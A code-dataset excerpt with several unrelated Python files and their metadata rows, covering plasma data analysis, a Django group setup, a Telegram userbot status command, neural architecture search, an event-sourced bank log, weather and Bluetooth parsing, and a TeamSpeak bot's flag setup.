                if db_ind[0].size != 0:
                    if db_ind[0].size != 1:
T_e=db_dict['T_e_max_grad'][db_ind][0]
n_e=db_dict['n_e_max_grad'][db_ind][0]
else:
T_e=db_dict['T_e_max_grad'][db_ind]
n_e=db_dict['n_e_max_grad'][db_ind]
print(shot, elm_time, T_e, n_e, )
if T_e != 0 and T_e < 2.:
database_single['T_e']+=T_e
notnan_db_single['T_e']+=1
if n_e != 0.:
database_single['n_e']+=n_e
notnan_db_single['n_e']+=1
try:
if velocity_results['Position max'][elm_time_ind,0] != 0.:
b_pol=flap.get_data('NSTX_MDSPlus',
name='\EFIT02::\BZZ0',
exp_id=shot,
object_name='BZZ0').slice_data(slicing={'Time':elm_time,
'Device R':velocity_results['Position max'][elm_time_ind,0]}).data
database_single['B_pol']+=b_pol
notnan_db_single['B_pol']+=1
except:
pass
try:
if velocity_results['Position max'][elm_time_ind,0] != 0.:
b_tor=flap.get_data('NSTX_MDSPlus',
name='\EFIT02::\BTZ0',
exp_id=shot,
object_name='BTZ0').slice_data(slicing={'Time':elm_time,
'Device R':velocity_results['Position max'][elm_time_ind,0]}).data
database_single['B_tor']+=b_tor
notnan_db_single['B_tor']+=1
except:
pass
try:
if velocity_results['Position max'][elm_time_ind,0] != 0.:
b_rad=flap.get_data('NSTX_MDSPlus',
name='\EFIT02::\BRZ0',
exp_id=shot,
object_name='BRZ0').slice_data(slicing={'Time':elm_time,
'Device R':velocity_results['Position max'][elm_time_ind,0]}).data
database_single['B_rad']+=b_rad
notnan_db_single['B_rad']+=1
except:
pass
for key in average_results.keys():
notnan_counter[key][np.where(notnan_counter[key] == 0)] = 1.
if 'ccf' in key:
if len(average_results[key].shape) == 1:
average_results[key]=average_results[key]/(notnan_counter[key])
else:
average_results[key][:,0]=average_results[key][:,0]/(notnan_counter[key][:,0])
average_results[key][:,1]=average_results[key][:,1]/(notnan_counter[key][:,1])
else:
if len(average_results[key].shape) == 1:
average_results[key]=average_results[key]/(notnan_counter[key])
else:
average_results[key][:,0]=average_results[key][:,0]/(notnan_counter[key][:,0])
average_results[key][:,1]=average_results[key][:,1]/(notnan_counter[key][:,1])
try:
for key in database_single:
database_single[key]/=notnan_db_single[key]
except:
print(key, database_single[key], notnan_db_single[key])
for key in average_results:
if len(average_results[key].shape) == 1:
print(key, average_results[key][nwin])
else:
print(key, average_results[key][nwin,:])
for key in database_single:
print(key, database_single[key])
return average_results
| 54.147399 | 181 | 0.474086 | 2,004 | 18,735 | 4.153693 | 0.151697 | 0.037842 | 0.030034 | 0.025949 | 0.524988 | 0.441134 | 0.370975 | 0.322201 | 0.310428 | 0.310428 | 0 | 0.027992 | 0.426048 | 18,735 | 346 | 182 | 54.147399 | 0.746117 | 0.087643 | 0 | 0.315068 | 0 | 0 | 0.075534 | 0.011436 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003425 | false | 0.020548 | 0.034247 | 0 | 0.041096 | 0.020548 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6501be92de936ccea75975506702f6273eb33003 | 958 | py | Python | authentication/management/commands/init.py | HiroshiFuu/cs-balloting | 565eb3ee88769d88b27705828c10c7b5be964ef5 | [
"MIT"
] | null | null | null | authentication/management/commands/init.py | HiroshiFuu/cs-balloting | 565eb3ee88769d88b27705828c10c7b5be964ef5 | [
"MIT"
] | null | null | null | authentication/management/commands/init.py | HiroshiFuu/cs-balloting | 565eb3ee88769d88b27705828c10c7b5be964ef5 | [
"MIT"
] | null | null | null | from django.core.management.base import BaseCommand
from django.contrib.auth.models import Group
from django.contrib.auth.models import Permission
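# Invoke with: python manage.py init
# (the command below creates CompanyUserGroup and grants it the survey/user
# permissions)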
class Command(BaseCommand):
help = "Init Group"
# def add_arguments(self, parser):
# parser.add_argument('', nargs='+', help='')
def handle(self, *args, **options):
group, created = Group.objects.get_or_create(name='CompanyUserGroup')
print('Init Group', group)
permissions = ['Can add User', 'Can change User', 'Can delete User', 'Can view User', 'Can add Survey', 'Can change Survey', 'Can delete Survey', 'Can view Survey', 'Can add Survey Option', 'Can change Survey Option', 'Can delete Survey Option', 'Can view Survey Option', 'Can view Survey Result', 'Can view Survey Vote']
for p_name in permissions:
permission = Permission.objects.get(name__iexact=p_name)
print(permission)
group.permissions.add(permission) | 50.421053 | 329 | 0.685804 | 123 | 958 | 5.276423 | 0.390244 | 0.053929 | 0.080123 | 0.064715 | 0.169492 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195198 | 958 | 19 | 330 | 50.421053 | 0.841764 | 0.083507 | 0 | 0 | 0 | 0 | 0.327626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.461538 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65046a43f01644999a41068e20bb218d33e7cac9 | 3,426 | py | Python | userbot/modules/alive.py | im-bb/CyberUserBot | 945c2d6a4c05b11592611b2451a7cf15a40c3530 | [
"MIT"
] | 2 | 2021-09-24T06:19:40.000Z | 2021-09-30T12:24:56.000Z | userbot/modules/alive.py | im-bb/CyberUserBot | 945c2d6a4c05b11592611b2451a7cf15a40c3530 | [
"MIT"
] | null | null | null | userbot/modules/alive.py | im-bb/CyberUserBot | 945c2d6a4c05b11592611b2451a7cf15a40c3530 | [
"MIT"
] | null | null | null | # Copyright 2021 (C) CYBERUSERBOT
#
# Farid Dadashzade - CyberUserBot
import time
import asyncio
from asyncio import create_subprocess_exec as asyncrunapp
from asyncio.subprocess import PIPE as asyncPIPE
from shutil import which
from os import remove
from userbot import (
ALIVE_LOGO,
CYBER_VERSION,
StartTime,
JARVIS,
SUPPORT,
MYID,
ALIVE_TEXT,
bot
)
from userbot.events import register
from userbot.cmdhelp import CmdHelp
async def get_readable_time(seconds: int) -> str:
count = 0
up_time = ""
time_list = []
    time_suffix_list = ["seconds", "minutes", "hours", "days"]
while count < 4:
count += 1
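        # NB: divmod returns (quotient, remainder), so 'remainder' below is
        # really the carry into the next time unit and 'result' is the
        # current unit's value.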
remainder, result = divmod(seconds, 60) if count < 3 else divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for x in range(len(time_list)):
time_list[x] = str(time_list[x]) + time_suffix_list[x]
if len(time_list) == 4:
up_time += time_list.pop() + ", "
time_list.reverse()
up_time += ", ".join(time_list)
return up_time
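# e.g. await get_readable_time(3723) -> "1hours, 2minutes, 3seconds"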
@register(outgoing=True, disable_errors=True, pattern=r"^\.salive(?: |$)(.*)")
async def salive(alive):
user = await bot.get_me()
islememuddeti = await get_readable_time((time.time() - StartTime))
#uid = user.id
#cyber_m = uid.id
#cyber_mention = f"{user.first_name}](tg://user?id={cyber_m})"
kecid = (
f"**{ALIVE_TEXT}** \n"
f"┏━━━━━━━━━━━━━━━━━━━━━━\n"
f"┣[ 🧭 **Botun işləmə müddəti:** `{islememuddeti}`\n"
f"┣[ 👤 **Mənim sahibim:** `{user.first_name}`\n"
f"┣[ 🐍 **Python:** `3.8.6`\n"
f"┣[ ⚙️ **Telethon:** `1.23.0`\n"
f"┣[ 👁🗨 **İstifadəçi adı:** @{user.username}\n"
f"┣[ 🗄 **Branch:** `Master`\n"
f"┗━━━━━━━━━━━━━━━━━━━━━━\n"
f"**C Y B Ξ R Version:** `{CYBER_VERSION}`"
)
if ALIVE_LOGO:
try:
logo = ALIVE_LOGO
await alive.delete()
msg = await bot.send_file(alive.chat_id, logo, caption=kecid)
await asyncio.sleep(100)
await msg.delete()
except BaseException:
await alive.edit(
kecid + "\n\n *`Təqdim olunan logo etibarsızdır."
"\nKeçidin logo şəklinə yönəldiyindən əmin olun`"
)
await asyncio.sleep(100)
await alive.delete()
else:
await alive.edit(kecid)
await asyncio.sleep(100)
await alive.delete()
@register(incoming=True, from_users=SUPPORT, disable_errors=True, pattern="^.wlive$")
@register(incoming=True, from_users=JARVIS, pattern="^.alive$")
async def jarvisalive(jarvis):
if jarvis.fwd_from:
return
if jarvis.is_reply:
reply = await jarvis.get_reply_message()
replytext = reply.text
reply_user = await jarvis.client.get_entity(reply.from_id)
ren = reply_user.id
        if jarvis.sender_id == 1527722982:
            xitab = "My master"
        else:
            xitab = "My master"
if ren == MYID:
Version = str(CYBER_VERSION.replace("v",""))
            await jarvis.reply(f"`{xitab}` **C Y B Ξ R is active...**\n**C Y B Ξ R Version:** `{CYBER_VERSION}`")
else:
return
else:
return
Help = CmdHelp('salive')
Help.add_command('salive', None, 'Alive message with GIF')
Help.add()
| 30.318584 | 112 | 0.573847 | 438 | 3,426 | 4.506849 | 0.385845 | 0.036474 | 0.009119 | 0.006079 | 0.110436 | 0.078521 | 0.06079 | 0.024316 | 0 | 0 | 0 | 0.016546 | 0.276708 | 3,426 | 112 | 113 | 30.589286 | 0.755044 | 0.044658 | 0 | 0.159574 | 0 | 0.010638 | 0.183711 | 0.021739 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.085106 | 0 | 0.12766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6507cbc00efcf07f19f2cd7f19240245f2ab1c12 | 5,071 | py | Python | nnabla_nas/runner/searcher/pnas.py | sony/nnabla-nas | 269deb8229fda0f0901c47d21ac5ce244f403f63 | [
"Apache-2.0"
] | 16 | 2020-07-10T08:31:18.000Z | 2022-03-24T13:28:15.000Z | nnabla_nas/runner/searcher/pnas.py | sony/nnabla-nas | 269deb8229fda0f0901c47d21ac5ce244f403f63 | [
"Apache-2.0"
] | 1 | 2020-10-21T12:46:30.000Z | 2021-02-03T00:18:29.000Z | nnabla_nas/runner/searcher/pnas.py | sony/nnabla-nas | 269deb8229fda0f0901c47d21ac5ce244f403f63 | [
"Apache-2.0"
] | 3 | 2020-07-15T11:42:11.000Z | 2022-03-25T16:54:49.000Z | # Copyright (c) 2020 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nnabla as nn
import numpy as np
from .search import Searcher
from nnabla_nas.utils.estimator.latency import LatencyEstimator
from nnabla_nas.utils.estimator.latency import LatencyGraphEstimator
class ProxylessNasSearcher(Searcher):
r""" ProxylessNAS: Direct Neural Architecture Search on Target Task and
Hardware.
"""
def callback_on_start(self):
r"""Gets the architecture parameters."""
self._reward = nn.NdArray.from_numpy_array(np.zeros((1,)))
def train_on_batch(self, key='train'):
r"""Update the model parameters."""
self.update_graph(key)
params = self.model.get_net_parameters(grad_only=True)
self.optimizer[key].set_parameters(params)
bz, p = self.mbs_train, self.placeholder['train']
self.optimizer[key].zero_grad()
if self.comm.n_procs > 1:
grads = [x.grad for x in params.values()]
self.event.default_stream_synchronize()
for _ in range(self.accum_train):
self._load_data(p, self.dataloader['train'].next())
p['loss'].forward(clear_no_need_grad=True)
for k, m in p['metrics'].items():
m.forward(clear_buffer=True)
self.monitor.update(f'{k}/train', m.d.copy(), bz)
p['loss'].backward(clear_buffer=True)
loss = p['loss'].d.copy()
self.monitor.update('loss/train', loss * self.accum_train, bz)
if self.comm.n_procs > 1:
self.comm.all_reduce(grads, division=True, inplace=False)
self.event.add_default_stream_event()
self.optimizer[key].update()
def valid_on_batch(self):
r"""Update the arch parameters."""
beta, n_iter = 0.9, 10
bz, p = self.mbs_valid, self.placeholder['valid']
valid_data = [self.dataloader['valid'].next()
for i in range(self.accum_valid)]
rewards, grads = [], []
if self.comm.n_procs > 1:
self.event.default_stream_synchronize()
for _ in range(n_iter):
reward = 0
self.update_graph('valid')
arch_params = self.model.get_arch_parameters(grad_only=True)
self.optimizer['valid'].set_parameters(arch_params)
for minibatch in valid_data:
self._load_data(p, minibatch)
p['loss'].forward(clear_buffer=True)
for k, m in p['metrics'].items():
m.forward(clear_buffer=True)
self.monitor.update(f'{k}/valid', m.d.copy(), bz)
loss = p['loss'].d.copy()
reward += (1 - p['metrics']['error'].d) / self.accum_valid
self.monitor.update('loss/valid', loss * self.accum_valid, bz)
# adding constraints
for k, v in self.optimizer.get('regularizer', {}).items():
if isinstance(v, LatencyGraphEstimator):
# when using LatencyGraphEstimator (by graph)
inp = [nn.Variable((1,)+si[1:]) for si in
self.model.input_shapes]
out = self.model.call(*inp)
value = v.get_estimation(out)
elif isinstance(v, LatencyEstimator):
# when using LatencyEstimator (by module)
value = v.get_estimation(self.model)
else:
raise NotImplementedError
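                # Soft latency constraint: shrink the reward when the
                # estimate exceeds the bound,
                # reward *= min(1, bound/value)**weight.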
reward *= (min(1.0, v._bound / value))**v._weight
self.monitor.update(k, value, 1)
rewards.append(reward)
grads.append([m.g.copy() for m in arch_params.values()])
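        # REINFORCE with a baseline: each sampled architecture's stored
        # gradients are weighted by its advantage (reward - self._reward, an
        # exponential moving average of past rewards) and averaged over n_iter.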
# compute gradients
for j, m in enumerate(arch_params.values()):
m.grad.zero()
for i, r in enumerate(rewards):
m.g += (r - self._reward.data)*grads[i][j]/n_iter
# update global reward
self._reward.data = beta*sum(rewards)/n_iter + \
(1 - beta)*self._reward.data
if self.comm.n_procs > 1:
self.comm.all_reduce(
[x.grad for x in arch_params.values()],
division=True,
inplace=False
)
self.comm.all_reduce(self._reward, division=True, inplace=False)
self.event.add_default_stream_event()
self.monitor.update('reward', self._reward.data[0], self.bs_valid)
self.optimizer['valid'].update()
| 39.310078 | 78 | 0.592585 | 638 | 5,071 | 4.583072 | 0.31348 | 0.019152 | 0.034884 | 0.015048 | 0.227086 | 0.20041 | 0.170657 | 0.137483 | 0.108071 | 0.108071 | 0 | 0.00724 | 0.291856 | 5,071 | 128 | 79 | 39.617188 | 0.807018 | 0.175902 | 0 | 0.162791 | 0 | 0 | 0.034132 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034884 | false | 0 | 0.05814 | 0 | 0.104651 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
650816ad102306b4e782ed36bd66e6c3a46bdff8 | 2,285 | py | Python | event_sourced_bank/transaction_log_service.py | sfinnie/event_sourced_bank | dcec864724e85ac8049a377ee2f6e2c05b1b6a2c | [
"MIT"
] | 5 | 2022-02-17T05:54:49.000Z | 2022-03-09T20:13:21.000Z | event_sourced_bank/transaction_log_service.py | sfinnie/event_sourced_bank | dcec864724e85ac8049a377ee2f6e2c05b1b6a2c | [
"MIT"
] | 2 | 2022-02-17T14:19:16.000Z | 2022-02-17T14:21:31.000Z | event_sourced_bank/transaction_log_service.py | sfinnie/event_sourced_bank | dcec864724e85ac8049a377ee2f6e2c05b1b6a2c | [
"MIT"
] | 1 | 2022-03-03T05:03:23.000Z | 2022-03-03T05:03:23.000Z | from uuid import UUID, uuid5, NAMESPACE_URL
from eventsourcing.system import ProcessApplication
from eventsourcing.dispatch import singledispatchmethod
from event_sourced_bank.domain_model import Account
from eventsourcing.application import EventSourcedLog, LogEvent
import logging
class AccountEvent(LogEvent):
account_id: UUID
transaction_type: str
amount: int = 0
class TransactionLogService(ProcessApplication):
"""Listens for all account transaction events and
saves them into a log"""
def __init__(self, env=None) -> None:
super().__init__(env=env)
self.transaction_log = EventSourcedLog(
events=self.events,
originator_id=uuid5(NAMESPACE_URL, "/transactions"),
logged_cls=AccountEvent,
)
@singledispatchmethod
def policy(self, domain_event, process_event):
"""Default policy"""
@policy.register(Account.Created)
def add_created_txn(self, domain_event, process_event) -> None:
event = self.transaction_log.trigger_event(account_id=domain_event.originator_id,
transaction_type="Creation",
amount=0)
self.save(event)
@policy.register(Account.Credited)
def add_credit_txn(self, domain_event, process_event) -> None:
event = self.transaction_log.trigger_event(account_id=domain_event.originator_id,
transaction_type="Credit",
amount=domain_event.amount)
self.save(event)
@policy.register(Account.Debited)
def add_debit_txn(self, domain_event, process_event) -> None:
event = self.transaction_log.trigger_event(account_id=domain_event.originator_id,
transaction_type="Debit",
amount=domain_event.amount)
self.save(event)
def get_transactions(self):
txns = [{"account_id": txn.account_id,
"timestamp": txn.timestamp,
"amount": txn.amount,
"type": txn.transaction_type} for txn in self.transaction_log.get()]
return txns
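# Wiring sketch with the eventsourcing library's runner ('BankAccountService'
# is an assumed name for the upstream application emitting Account events):
#   from eventsourcing.system import System, SingleThreadedRunner
#   system = System(pipes=[[BankAccountService, TransactionLogService]])
#   runner = SingleThreadedRunner(system)
#   runner.start()
#   runner.get(TransactionLogService).get_transactions()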
| 38.083333 | 89 | 0.617943 | 231 | 2,285 | 5.865801 | 0.30303 | 0.073063 | 0.066421 | 0.064945 | 0.37048 | 0.350554 | 0.309963 | 0.256827 | 0.256827 | 0.256827 | 0 | 0.002509 | 0.302407 | 2,285 | 59 | 90 | 38.728814 | 0.847553 | 0.036324 | 0 | 0.181818 | 0 | 0 | 0.02793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.136364 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65081cd26e674a3288fc0ad9ebda72bf4b1a9b9f | 296 | py | Python | example/example.py | fl16180/gtrends-tools | 7af4c9b18345911aa8642eb9a45d4291bb1a4017 | [
"MIT"
] | 3 | 2018-10-05T17:56:18.000Z | 2020-03-27T18:21:04.000Z | example/example.py | fl16180/gtrends-tools | 7af4c9b18345911aa8642eb9a45d4291bb1a4017 | [
"MIT"
] | 1 | 2020-10-05T23:46:26.000Z | 2020-10-27T00:17:45.000Z | example/example.py | fl16180/gtrends-tools | 7af4c9b18345911aa8642eb9a45d4291bb1a4017 | [
"MIT"
] | 2 | 2018-09-12T19:05:09.000Z | 2021-04-12T02:53:30.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import healthtrends
DIR = './'
queries = ['tofu', 'exercise']
gt = healthtrends.TrendsSession(api_key='xxx')
gt.request_trends(term_list=queries, geo_level='country', geo_id='US')
gt.save_to_csv(directory=DIR, fname='healthy_trends.csv')
| 22.769231 | 71 | 0.682432 | 40 | 296 | 4.85 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003891 | 0.131757 | 296 | 12 | 72 | 24.666667 | 0.750973 | 0.128378 | 0 | 0 | 0 | 0 | 0.180328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
650ebc6e0d16246ba1010006e0f6067b875b37b0 | 2,643 | py | Python | model/weather.py | otti0815/EInk-Calendar | c2f21598bdba930959ca9e3fc2aea3e61bfff836 | [
"MIT"
] | null | null | null | model/weather.py | otti0815/EInk-Calendar | c2f21598bdba930959ca9e3fc2aea3e61bfff836 | [
"MIT"
] | null | null | null | model/weather.py | otti0815/EInk-Calendar | c2f21598bdba930959ca9e3fc2aea3e61bfff836 | [
"MIT"
] | null | null | null | import datetime
from pyowm import OWM
class OpenWeatherMapModel:
def __init__(self, api_key: str, city_id: int):
self.owm = OWM(api_key)
self._city_id = city_id
self._unit = 'celsius'
self._current_weather = (0, 0, 0, 0, 0)
self._forecast = []
@property
def city_id(self):
return self._city_id
@city_id.setter
def city_id(self, city_id: int):
self._city_id = city_id
@property
def temperature_unit(self):
return self._unit
@temperature_unit.setter
def temperature_unit(self, unit: str):
assert unit == 'fahrenheit' or unit == 'celsius'
self._unit = unit
def _parse_weather(self, weather):
temperature = weather.get_temperature(unit=self.temperature_unit)
humidity = weather.get_humidity()
weather_code = weather.get_weather_code()
return (weather_code,
temperature.get('temp_min', temperature.get('min')),
temperature.get('temp_max', temperature.get('max')),
temperature.get('temp'),
humidity)
def get_current_weather(self):
"""
Get the current weather data
:return: Tuple of weather code, temperature range, current temperature
and humidity
"""
try:
obs = self.owm.weather_at_id(self.city_id)
weather = obs.get_weather()
self._current_weather = self._parse_weather(weather)
except Exception as exception:
print(exception)
return self._current_weather
def get_daily_forecast(self, limit=14, include_today=False):
"""
Get a list of forecasts
:param limit: The max number of forecasts to get
:param include_today: whether include today in the forecast
:return: list of tuples of weather code, temperature range, temperature
and humidity
"""
try:
forecaster = self.owm.daily_forecast_at_id(self.city_id,
limit=limit)
weathers = forecaster.get_forecast().get_weathers()
today = datetime.datetime.now().date()
if not include_today:
weathers = filter(
lambda weather: not (weather.get_reference_time(
timeformat='date').date() == today), weathers)
self._forecast = list(
map(lambda weather: self._parse_weather(weather), weathers))
except Exception as exception:
print(exception)
return self._forecast
| 34.324675 | 79 | 0.591752 | 293 | 2,643 | 5.105802 | 0.259386 | 0.048128 | 0.040107 | 0.028075 | 0.196524 | 0.066845 | 0.066845 | 0.066845 | 0 | 0 | 0 | 0.003904 | 0.321604 | 2,643 | 76 | 80 | 34.776316 | 0.830452 | 0.131669 | 0 | 0.185185 | 0 | 0 | 0.024545 | 0 | 0 | 0 | 0 | 0 | 0.018519 | 1 | 0.148148 | false | 0 | 0.037037 | 0.037037 | 0.296296 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6511059cc50336446b681997c39676c41f12de34 | 4,910 | py | Python | igsparser/advertisement.py | timscchao/ingics-message-parser-py | 865eca5fc8245d2b9b577085a201eaa3c139ada1 | [
"MIT"
] | null | null | null | igsparser/advertisement.py | timscchao/ingics-message-parser-py | 865eca5fc8245d2b9b577085a201eaa3c139ada1 | [
"MIT"
] | 1 | 2021-05-20T07:11:34.000Z | 2021-05-20T07:11:34.000Z | igsparser/advertisement.py | timscchao/ingics-message-parser-py | 865eca5fc8245d2b9b577085a201eaa3c139ada1 | [
"MIT"
] | null | null | null | import uuid
import struct
import pprint
from .appearance import appearanceList
from .msd import Msd
class Advertisement:
def __init__(self, payload):
self.raw = bytearray.fromhex(payload)
self.flags = None
self.localName = None
self.txPowerLevel = None
self.manufacturerData = None
self.serviceData = []
self.serviceUuids = []
self.serviceSolicitationUuids = []
self.parse()
def __repr__(self):
return pprint.pformat(vars(self))
def parse(self):
i = 0
length = len(self.raw)
while i < length:
adLength = self.raw[i]
            # handle beacons that append '00..' padding at the end of the payload
if adLength == 0:
break
adType = self.raw[i + 1]
adData = self.raw[i + 2: i + adLength + 1]
# Flags
if adType == 0x01:
self.flags = struct.unpack('B', bytes(adData))[0]
# Complete List of 16-bit Service Class UUIDs
elif adType == 0x03:
adData.reverse()
self.serviceUuids.append(bytes(adData).hex().upper())
# Complete List of 128-bit Service Class UUIDs
elif adType == 0x07:
adData.reverse()
self.serviceUuids.append(str(uuid.UUID(bytes(adData).hex())).upper())
# Shortened Local Name
# Complete Local Name
elif adType == 0x08 or adType == 0x09:
self.localName = adData.decode('utf-8')
# Tx Power Level
elif adType == 0x0A:
self.txPowerLevel = struct.unpack('b', bytes(adData))[0]
# Service Data - 16-bit UUID
elif adType == 0x16:
serviceUuid = struct.unpack('H', bytes(adData[0:2]))[0]
serviceData = adData[2:]
self.serviceData.append({
'uuid': serviceUuid,
'data': bytes(serviceData)
})
serviceData.reverse()
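                # NOTE: the bytes are reversed before the native-order
                # unpacks below, so on little-endian hosts the service data
                # is effectively read big-endian.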
if serviceUuid == 0x2AC3:
# org.bluetooth.characteristic.object_id
self.objectId = bytes(serviceData).hex().upper()
elif serviceUuid == 0x2A6E:
# org.bluetooth.characteristic.temperature
self.temperature = struct.unpack('h', bytes(serviceData))[0] / 100
self.temperatureUnit = 'C'
elif serviceUuid == 0x2A1F:
# org.bluetooth.unit.thermodynamic_temperature.degree_celsius
self.temperature = struct.unpack('h', bytes(serviceData))[0] / 10
self.temperatureUnit = 'C'
elif serviceUuid == 0x2A20:
# org.bluetooth.unit.thermodynamic_temperature.degree_fahrenheit
self.temperature = struct.unpack('h', bytes(serviceData))[0] / 10
self.temperatureUnit = 'F'
elif serviceUuid == 0x2A6F:
# org.bluetooth.characteristic.humidity
self.humidity = struct.unpack('h', bytes(serviceData))[0] / 100
# List of 16-bit Service Solicitation UUIDs
# List of 32-bit Service Solicitation UUIDs
elif adType == 0x14 or adType == 0x1F:
adData.reverse()
self.serviceSolicitationUuids.append(bytes(adData).hex().upper())
# List of 128 bit Service Solicitation UUIDs
elif adType == 0x15:
adData.reverse()
self.serviceSolicitationUuids.append(str(uuid.UUID(bytes(adData).hex())).upper())
# Appearance
elif adType == 0x19:
val = str(struct.unpack('H', bytes(adData))[0])
                self.appearance = appearanceList[val] if val in appearanceList else val
# Service Data - 32-bit UUID
elif adType == 0x20:
serviceUuid = adData[0:4]
serviceData = adData[4:]
serviceUuid.reverse()
serviceData.reverse()
self.serviceData.append({
'uuid': bytes(serviceUuid).hex().upper(),
'data': bytes(serviceData).hex().upper()
})
# Service Data - 128-bit UUID
elif adType == 0x21:
serviceUuid = adData[0:16]
serviceData = adData[16:]
serviceUuid.reverse()
serviceData.reverse()
self.serviceData.append({
'uuid': str(uuid.UUID(bytes(serviceUuid).hex())).upper(),
'data': bytes(serviceData).hex().upper()
})
# Manufacturer Specific Data
elif adType == 0xFF:
self.manufacturerData = Msd(adData)
i += adLength + 1
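# Usage sketch (payload is a hex string of raw advertising data):
#   adv = Advertisement('0201060303AAFE050974657374')
#   adv.flags         # -> 6
#   adv.serviceUuids  # -> ['FEAA'] (Eddystone)
#   adv.localName     # -> 'test'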
| 42.327586 | 97 | 0.519959 | 459 | 4,910 | 5.533769 | 0.270153 | 0.043307 | 0.030709 | 0.04252 | 0.443307 | 0.331102 | 0.202756 | 0.188583 | 0.096063 | 0.096063 | 0 | 0.036286 | 0.376986 | 4,910 | 115 | 98 | 42.695652 | 0.79405 | 0.141548 | 0 | 0.233333 | 0 | 0 | 0.009537 | 0 | 0 | 0 | 0.020505 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.055556 | 0.011111 | 0.111111 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651372c7def59ca028c6393016324ca2c8e36168 | 13,519 | py | Python | ts3_bot.py | lukegb/amongus | e03bf5e19db78e6c318d63739614fae78ff7f331 | [
"Apache-2.0"
] | 8 | 2020-10-25T00:16:06.000Z | 2021-05-12T08:39:27.000Z | ts3_bot.py | lukegb/amongus | e03bf5e19db78e6c318d63739614fae78ff7f331 | [
"Apache-2.0"
] | null | null | null | ts3_bot.py | lukegb/amongus | e03bf5e19db78e6c318d63739614fae78ff7f331 | [
"Apache-2.0"
] | null | null | null | # SPDX-FileCopyrightText: 2020 Luke Granger-Brown
#
# SPDX-License-Identifier: Apache-2.0
import dataclasses
import multiprocessing
import queue
import threading
import time
from typing import FrozenSet
from absl import app
from absl import flags
from absl import logging
import scapy.all
import ts3
import amongus.rpcs
import amongus.state_tracker
FLAGS = flags.FLAGS
flags.DEFINE_string(
"connection_string",
None,
"py-ts3 connection string (e.g. ssh://serveradmin:foooo@localhost:10022)",
)
flags.DEFINE_integer("server_id", 1, "Server ID of virtual server to use.")
flags.DEFINE_integer(
"main_channel_id", 62, "Main channel ID (for people who are alive, etc.)"
)
flags.DEFINE_integer("dead_channel_id", 65, "Dead channel ID (for people who are dead)")
flags.DEFINE_integer("alive_server_group", 25, "Server group to add alive people to")
flags.DEFINE_integer("dead_server_group", 24, "Server group to add dead people to")
# flags.DEFINE_integer("observer_server_group", 11, "Server group to treat as observers")
flags.DEFINE_integer(
"round_live_talk_power", 300, "Talk power to set main channel to during rounds"
)
flags.DEFINE_integer(
"round_discuss_talk_power",
200,
"Talk power to set main channel to during discussion time",
)
flags.DEFINE_integer(
